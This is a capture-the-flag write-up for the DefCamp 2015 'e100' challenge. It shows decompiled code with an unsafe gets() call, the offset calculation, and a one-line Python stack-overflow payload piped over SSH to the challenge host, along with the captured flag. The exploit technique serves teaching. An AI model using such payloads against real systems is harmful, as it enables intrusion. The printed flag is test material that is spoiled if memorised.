Tags: bufferoverflow 

Rating:

[](ctf=defcamp-quals-2015)
[](type=exploit)
[](tags=buffer-overflow)

We are given a [binary](../e100.bin) and a [key](../id_rsa_e100).

```bash
$ file e100.bin
e100.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4410355efef2e99ac54e4028dba1b3e40d055fee, stripped
```
Also loading in gdb-peda.
```bash
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
```
Good. Loading the binary in [Hopper](http://www.hopperapp.com/) and decompiling.
```c
function sub_80484fd {
var_C = *0x14;
printf("Enter password: ");
gets(var_2C);
if (arg0 == 0xbadb0169) {
system("cat flag");
}
else {
for (var_30 = 0x0; var_30 < strlen(var_2C); var_30 = var_30 + 0x1) {
*(int8_t *)(var_30 + var_2C) = arg0 ^ *(int8_t *)(var_30 + var_2C) & 0xff;
}
printf("Your new secure password is: ");
printf(var_2C);
}
eax = var_C ^ *0x14;
COND = eax == 0x0;
if (!COND) {
eax = __stack_chk_fail();
}
return eax;
}
```
So a gets and a static hardcoded check. Basic buffer overflow!!

```bash
0x804851b: lea eax,[ebp-0x2c]
0x804851e: mov DWORD PTR [esp],eax
=> 0x8048521: call 0x80483a0 <gets@plt>
0x8048526: cmp DWORD PTR [ebp+0x8],0xbadb0169
```
This gives us padding = 0x2c+0x8 = 52
Now the final blow.
```bash
$ python -c "print 'A'*52+'\xba\xdb\x01\x69'[::-1]" | ssh -i id_rsa_e100 [email protected]
Pseudo-terminal will not be allocated because stdin is not a terminal.
DCTF{3671bacdb5ea5bc26982df7da6de196e}
Enter password: *** stack smashing detected ***: /home/dctf/e100 terminated
```

Flag:
>DCTF{3671bacdb5ea5bc26982df7da6de196e}

Original writeup (https://github.com/ByteBandits/writeups/tree/master/defcamp-quals-2015/exploit/e100/sudhackar).